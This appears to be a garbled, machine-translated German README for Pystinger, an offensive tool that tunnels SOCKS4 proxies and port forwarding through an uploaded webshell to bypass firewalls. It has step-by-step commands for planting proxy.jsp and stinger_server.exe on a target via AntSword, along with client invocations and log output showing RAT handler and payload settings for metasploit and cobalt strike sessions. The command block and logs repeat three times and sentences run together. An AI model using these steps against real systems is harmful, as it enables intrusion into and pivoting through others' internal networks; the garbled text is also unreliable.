
Firewall-Umgehung für die Verkehrsweiterleitung mittels Webshell
Englisch | 简体中文
Pystinger implementiert SOCK4-Proxy und Portweiterleitung über eine Webshell.
Es kann direkt von metasploit-framework, viper, cobalt strike für den Online-Betrieb von Sessions verwendet werden.
Pystinger ist in Python entwickelt und unterstützt derzeit drei Proxy-Skripte: php, jsp(x) und aspx.
Angenommen, der Domainname des Servers ist http://example.com :8080 Die Intranet-IP-Adresse des Servers ist 192.168.3.11
proxy.jsp Auf den Zielserver hochladen und sicherstellen, dass http://example.com:8080/proxy.jsp erreichbar ist, die Seite gibt UTF-8 zurückstinger_server.exe Auf den Zielserver hochladen, AntSword cmd ausführen: start D:/XXX/stinger_server.exe um pystinger-server zu startenFühren Sie
D:/xxx/singer_server.exenicht direkt aus, da dies zu einer TCP-Trennung führt.
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 ausroot@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
127.0.0.1:60000 für das Intranet von example.com gestartet.example.com) 127.0.0.1:60020 auf den VPS 127.0.0.1:60020 gemappt.proxy.jsp Auf den Zielserver hochladen und sicherstellen, dass http://example.com:8080/proxy.jsp erreichbar ist, die Seite gibt UTF-8 zurückstinger_server.exe Auf den Zielserver hochladen, AntSword cmd ausführen: start D:/XXX/stinger_server.exe um pystinger-server zu startenFühren Sie
D:/xxx/singer_server.exenicht direkt aus, da dies zu einer TCP-Trennung führt.
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 ausroot@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
60020 (Handler/LISTEN-Port in der RAT CONFIG der Ausgabe), Listener-Adresse ist 127.0.0.1proxy.jsp Auf den Zielserver hochladen und sicherstellen, dass http://example.com:8080/proxy.jsp erreichbar ist, die Seite gibt UTF-8 zurückstinger_server.exe Auf den Zielserver hochladen, AntSword cmd ausführen: start D:/XXX/stinger_server.exe 192.168.3.11 um pystinger-server zu starten (192.168.3.11 ist die Intranet-IP-Adresse des Ziels)192.168.3.11 kann auf 0.0.0.0 geändert werden
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 ausroot@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
60020 (Handler/LISTEN-Port in der RAT CONFIG der Ausgabe), Listener-Adresse ist 192.168.3.11Wenn die Webshell Cookie oder Autorisierung konfigurieren muss, kann der Request-Header über den Parameter -- header konfiguriert werden
--header "Authorization: XXXXXX,Cookie: XXXXX"
Wenn die Webshell über einen Proxy erreicht werden muss, können Sie den Proxy über --proxy setzen
--proxy "socks5:127.0.0.1:1081"
https://github.com/nccgroup/ABPTTS
https://github.com/sensepost/reGeorg
https://github.com/SECFORCE/Tunna
2.0 Aktualisierungszeit: 2019-09-29
2.1 Aktualisierungszeit: 2020-01-07
Die Entwicklung wird durch die Software von jetbrains unterstützt.
https://www.jetbrains.com/?from=pystinger